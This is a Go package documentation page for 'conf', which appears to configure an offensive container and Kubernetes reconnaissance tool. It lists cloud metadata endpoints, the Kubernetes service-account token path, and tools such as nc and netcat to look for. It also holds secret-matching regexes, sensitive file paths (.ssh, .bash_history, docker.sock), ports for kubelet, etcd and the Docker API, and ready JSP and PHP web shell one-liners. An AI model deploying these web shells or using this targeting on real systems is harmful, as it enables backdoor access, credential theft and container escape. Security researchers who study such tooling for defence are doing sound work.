conf

package
v0.1.9 Latest Latest
Warning

This package is not in the latest version of its module.

 Go to latest Published: Jan 29, 2021 License: GPL-2.0 Imports: 1 Imported by: 0

Documentation

Index

Constants

This section is empty.

Variables

View Source 
var CloudAPI = []cloudAPIS{
	{
		CloudProvider: "Alibaba Cloud",
		API:           "http://100.100.100.200/latest/meta-data/",
		ResponseMatch: "instance-id",
		DocURL:        "https://help.aliyun.com/knowledge_detail/49122.html",
	},
	{
		CloudProvider: "Azure",
		API:           "http://169.254.169.254/metadata/instance",
		ResponseMatch: "azEnvironment",
		DocURL:        "https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service",
	},
	{
		CloudProvider: "Google Cloud",
		API:           "http://metadata.google.internal/computeMetadata/v1/instance/disks/?recursive=true",
		ResponseMatch: "deviceName",
		DocURL:        "https://cloud.google.com/compute/docs/storing-retrieving-metadata",
	},
	{
		CloudProvider: "Tencent Cloud",
		API:           "http://metadata.tencentyun.com/latest/meta-data/",
		ResponseMatch: "instance-name",
		DocURL:        "https://cloud.tencent.com/document/product/213/4934",
	},
}
View Source 
var K8sSATokenDefaultPath = "/var/run/secrets/kubernetes.io/serviceaccount/token"
View Source 
var LinuxCommandChecklist = []string{
	"curl",
	"wget",
	"nc",
	"netcat",
	"kubectl",
	"docker",
	"find",
	"ps",
	"java",
	"python",
	"python3",
	"php",
	"node",
	"npm",
	"apt",
	"yum",
	"dpkg",
	"nginx",
	"httpd",
	"apache",
	"apache2",
	"ssh",
	"mysql",
	"mysql-client",
	"git",
	"svn",
	"vi",
	"capsh",
	"mount",
	"fdisk",
}

check useful linux commands in container

View Source 
var ScanFileTextConf = textScanRules{
	MaxFileByte:        1024 * 1024,
	SkipExecutableFile: true,
	RegexList: map[string]string{
		"Slack Token":                  "(xox[p|b|o|a]-[0-9]{12}-[0-9]{12}-[0-9]{12}-[a-z0-9]{32})",
		"RSA private key":              "-----BEGIN RSA PRIVATE KEY-----",
		"SSH (OPENSSH) private key":    "-----BEGIN OPENSSH PRIVATE KEY-----",
		"SSH (DSA) private key":        "-----BEGIN DSA PRIVATE KEY-----",
		"SSH (EC) private key":         "-----BEGIN EC PRIVATE KEY-----",
		"PGP private key block":        "-----BEGIN PGP PRIVATE KEY BLOCK-----",
		"Facebook Oauth":               "[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].{0,30}['\"\\s][0-9a-f]{32}['\"\\s]",
		"Twitter Oauth":                "[t|T][w|W][i|I][t|T][t|T][e|E][r|R].{0,30}['\"\\s][0-9a-zA-Z]{35,44}['\"\\s]",
		"GitHub":                       "[g|G][i|I][t|T][h|H][u|U][b|B].{0,30}['\"\\s][0-9a-zA-Z]{35,40}['\"\\s]",
		"Google Oauth":                 "(\"client_secret\":\\s*?\"[a-zA-Z0-9-_]{24}\")",
		"AWS API Key":                  "AKIA[A-Z0-9]{16}",
		"Heroku API Key":               "[h|H][e|E][r|R][o|O][k|K][u|U].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}",
		"Generic Secret":               "[s|S][e|E][c|C][r|R][e|E][t|T].{0,30}['\"\\s][0-9a-zA-Z]{32,45}['\"\\s]",
		"Generic API Key":              "[a|A][p|P][i|I][_]?[k|K][e|E][y|Y].{0,30}['\"\\s][0-9a-zA-Z]{32,45}['\"\\s]",
		"Slack Webhook":                "https://hooks\\.slack\\.com/services/T[a-zA-Z0-9_]{8}/B[a-zA-Z0-9_]{8}/[a-zA-Z0-9_]{24}",
		"Google (GCP) Service-account": "\"type\": \"service_account\"",
		"Twilio API Key":               "SK[a-z0-9]{32}",
		"Password in URL":              "[a-zA-Z]{3,10}://[^/\\s:@]{3,20}:[^/\\s:@]{3,20}@.{1,100}[\"'\\s]",
	},
}
View Source 
var SensitiveEnvRegex = "(?i)\\bssh_|k8s|kubernetes|docker|gopath"

match ENV to find useful service

View Source 
var SensitiveFileConf = sensitiveFileRules{
	StartDir: "/",
	NameList: []string{
		`/docker.sock`,
		`/containerd.sock`,
		`/containerd/s/`,
		`.kube/`,
		`.git/`,
		`.svn/`,
		`.pip/`,
		`/.bash_history`,
		`/.bash_profile`,
		`/.bashrc`,
		`/.ssh/`,
		`.token`,
		`/serviceaccount`,
		`.dockerenv`,
		`/config.json`,
	},
}
View Source 
var SensitiveProcessRegex = "(?i)ssh|ftp|http|tomcat|nginx|engine|php|java|python|perl|ruby|kube|docker|\\bgo\\b"

match process name to find useful service

View Source 
var TCPScannerConf = TCPScannerConfS{
	Timeout:     500 * time.Millisecond,
	MaxParallel: 50,
	PortList: map[string]string{
		"ssh":                 "22",
		"http":                "80",
		"https":               "443",
		"docker-api":          "2375",
		"etcd":                "2379",
		"cAdvisor":            "4194",
		"k8s-api-server":      "6443",
		"http-1":              "8080",
		"https-1":             "8443",
		"kubelet-auth":        "10250",
		"kubelet-read":        "10255",
		"dashboard":           "30000",
		"nodeport-service":    "30001-32767",
		"tiller,weave,calico": "44134",
	},
}
View Source 
var WebShellCodeJSP = "<%Runtime.getRuntime().exec(request.getParameter(\"$SECRET_PARAM\"));%>"
View Source 
var WebShellCodePHP = "<?php @eval($_POST['$SECRET_PARAM']);?>"

Functions

This section is empty.

Types

type TCPScannerConfS 

type TCPScannerConfS struct {
	Timeout     time.Duration
	MaxParallel int64
	PortList    map[string]string
}

TCP port scanner

Source Files

View all Source files

Jump to

Keyboard shortcuts

? : This menu
/ : Search site
f or F : Jump to
y or Y : Canonical URL
go.dev uses cookies from Google to deliver and enhance the quality of its services and to analyze traffic. Learn more.